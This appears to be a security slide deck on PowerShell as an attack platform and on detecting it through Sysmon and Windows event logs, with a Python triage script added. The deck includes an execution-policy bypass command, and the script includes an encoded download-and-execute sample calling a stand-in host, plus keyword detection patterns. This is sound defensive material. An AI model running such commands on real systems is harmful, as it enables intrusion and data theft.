Casting a Hidden .NET

The Risks Associated with (unmanaged) PowerShell
© 2018 HITRUST Alliance

PowerShell as an Attack Platform
• Availability:
  – Built-in command shell in every Windows 7/2008 R2 and newer system
• Detection:
  – Not commonly blocked, or not effectively blocked
  – PowerShell logging not commonly enabled or monitored
• Capable:
  – Runs code in memory == no on-disk evidence
  – Downloads and executes code from the internet or another system
  – Many powerful capabilities

Living off the Land with PowerShell
• 38% of attacks involve PowerShell*. Why do attackers live off the land?
  – Reduces detection surface by using built-ins
  – Utilizes common, legitimate actions such as using cmd.exe
  – No AV or malware signatures; can bypass execution policy
  – Looks similar to normal activity, doesn't stand out (as much)
  PowerShell.exe /ExecutionPolicy bypass /file stealdata.ps1
* https://www.carbonblack.com/wp-content/uploads/2016/04/Cb-Powershell-Deep-Dive-A-United-Threat-Research-Report-1.pdf

You've Upgraded to PS v5 – Great!
• Allows new controls:
  – Limit PS command usage (Constrained Language Mode)
  – View obfuscated code (script block logging)
  – Monitor all PS execution (system-wide transcription)
• Did you uninstall PS v2?
  – If not, attackers can bypass the v5 defensive capabilities by "downgrading" and running under v2

But You're Blocking PowerShell.exe?...
• Blocking PowerShell.exe from running isn't enough
  – PS can be invoked without access to the executable (System.Management.Automation.dll)
• Attackers can provide their own "custom" PowerShell executable and run the code of their choosing (Unmanaged PowerShell)

What if You're NOT Blocking PowerShell.exe?
• There are bountiful detection opportunities!!
• Windows host-based logging:
  – Command line logging* (but blind to script and interactive sessions)
  – PowerShell event logs need to be enabled (version 3.0+)
  – Module logging... good luck! Event Codes 4103 and 4104 (4105/4106)
  – Transcription logging: full log of commands and output (version 5.0)
• Sysmon
  – Event ID 7: PowerShell that's not PowerShell (DLL loading of PS)
• Windows Security event log
  – Event ID 4688*: awesome detections, but you need to enable command line process auditing* (which you should be doing anyway)
* Link in Appendix

Strong Indicators of Malicious PowerShell Use
• Loading PowerShell via DLL
  – Sysmon Event ID 7
  – Indicator values:
    • Task Category = Image Loaded
    • Image = "*System.Management.Automation.ni.dll"
    • There are some filtering options in Sysmon that will help with this*
  – Other methods: the best way is to experiment
• A word on Sysmon and general scripting attacks like PowerShell....
* Link in Appendix

Strong Indicators of Malicious PowerShell Use (continued)
• Windows Security event log and Windows command line auditing*
  – Event ID 4688 (Process Created)
  – Things to look for: "-ExecutionPolicy", "bypass", "-enc", "Invoke-Expression" / "iex", "Net.WebClient"
  – See https://www.crowdstrike.com/blog/investigating-powershell-command-and-script-logging/ for a good example of what encoding looks like
  – Other methods: the best way is to experiment
• Machine learning
  – Some basic clustering helps you understand what is normal in your environment; anomalies/outliers are easy to spot
  – Some questions to ask:
    • Who normally runs PowerShell?
    • What are the normal and frequent commands?
    • Look at the length of commands
* Link on how to enable this is in Appendix

So, You Have EDR and Device Guard?...
• Watch your logs, watch your logs, watch your logs...
• Attackers can bypass EDR and Device Guard by running their code "reflectively"
  – Load and execute malicious code (.NET "assemblies") at run time using trusted executables
  – Code can be run in memory, thwarting some EDR solutions and leaving next to no host-based evidence

PS Requires a Safety
• PowerShell is a powerful tool for managing your Windows environment, but:
  – Enable enhanced logging and auditing to help your cyber security defenders
  – Utilize "Just Enough Administration" (JEA) configuration capabilities to dial in and limit PowerShell usage
• PowerShell is also a powerful attack tool; reduce risk by:
  – Enabling and MONITORING logs, enabling JEA, upgrading and removing old versions...

Closing Thought
PowerShell has lots of detection opportunities to explore... but start with the #1 incident response tool: The Google.

Visit www.HITRUSTAlliance.net for more information. To view our latest documents, visit the Content Spotlight.

Appendix: Resources
Configuring Command Line Process Auditing:
  https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/component-updates/command-line-process-auditing
Sysmon Filter:
  https://github.com/datasci4security/sysmon-config
General PowerShell Detections:
  https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
  https://www.blackhillsinfosec.com/powershell-w-o-powershell-simplified/
  https://arxiv.org/pdf/1804.04177.pdf (an article on using deep learning for PowerShell detections; if you know basic Python you can do this easily in Keras)
  https://www.carbonblack.com/wp-content/uploads/2016/04/Cb-Powershell-Deep-Dive-A-United-Threat-Research-Report-1.pdf
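As an added example that is not part of the slides, here is a small Python triage that implements the two "Strong Indicators" slides: the Sysmon Event ID 7 check for a non-PowerShell host process loading System.Management.Automation(.ni).dll (the DLL is read from Sysmon's ImageLoaded field, the host from Image), and the Event ID 4688 command-line keyword check, which also decodes the -enc payload so the keywords can be matched inside it and flags unusually long command lines. The sample events, the simplified field names, the host-process allow-list and the 500-character length threshold are constructed assumptions.

```python
import base64
import re

# Known PowerShell host processes: any other image loading the automation DLL is "PowerShell that's not PowerShell".
POWERSHELL_HOSTS = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}
AUTOMATION_DLL = re.compile(r"\\system\.management\.automation(\.ni)?\.dll$", re.I)
# Command-line keywords from the slides ("-" and "/" both introduce PowerShell parameters).
INDICATORS = re.compile(r"[-/]executionpolicy|\bbypass\b|invoke-expression|\biex\b|net\.webclient", re.I)
ENCODED = re.compile(r"[-/](?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
LONG_COMMAND = 500  # assumed threshold; tune it to what is normal in your environment
# Constructed sample events (not from the slides); field names are simplified from Sysmon EID 7 and Security EID 4688.
ENC_PAYLOAD = base64.b64encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"source": "Sysmon", "id": 7, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ImageLoaded": r"C:\Windows\assembly\NativeImages\System.Management.Automation.ni.dll"},
    {"source": "Sysmon", "id": 7, "Image": r"C:\Users\bob\AppData\Local\Temp\updater.exe",
     "ImageLoaded": r"C:\Windows\assembly\NativeImages\System.Management.Automation.ni.dll"},
    {"source": "Security", "id": 4688, "CommandLine": "PowerShell.exe /ExecutionPolicy bypass /file stealdata.ps1"},
    {"source": "Security", "id": 4688, "CommandLine": f"powershell.exe -NoP -enc {ENC_PAYLOAD}"},
    {"source": "Security", "id": 4688, "CommandLine": "powershell.exe Get-Process"},
]

def check_sysmon_image_load(ev):
    """Sysmon EID 7: flag a non-PowerShell image loading System.Management.Automation(.ni).dll."""
    if ev.get("id") != 7 or not AUTOMATION_DLL.search(ev.get("ImageLoaded", "")):
        return []
    host = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    return [] if host in POWERSHELL_HOSTS else [f"automation DLL loaded by non-PowerShell host {host}"]

def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -enc/-EncodedCommand, or None if absent or undecodable."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def check_process_created(ev):
    """Security EID 4688 with command-line auditing: slide keywords, also inside the decoded -enc payload."""
    cmd = ev.get("CommandLine", "")
    reasons = [f"indicator {m.group(0)!r}" for m in INDICATORS.finditer(cmd)]
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command present")
        reasons += [f"indicator {m.group(0)!r} in decoded payload" for m in INDICATORS.finditer(decoded)]
    if len(cmd) > LONG_COMMAND:
        reasons.append(f"command line length {len(cmd)} exceeds {LONG_COMMAND}")
    return reasons
```

Running the two check functions over SAMPLE_EVENTS, the updater.exe image load, the /ExecutionPolicy bypass line and the -enc line each return reasons, while the powershell.exe image load and the plain Get-Process line return empty lists.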
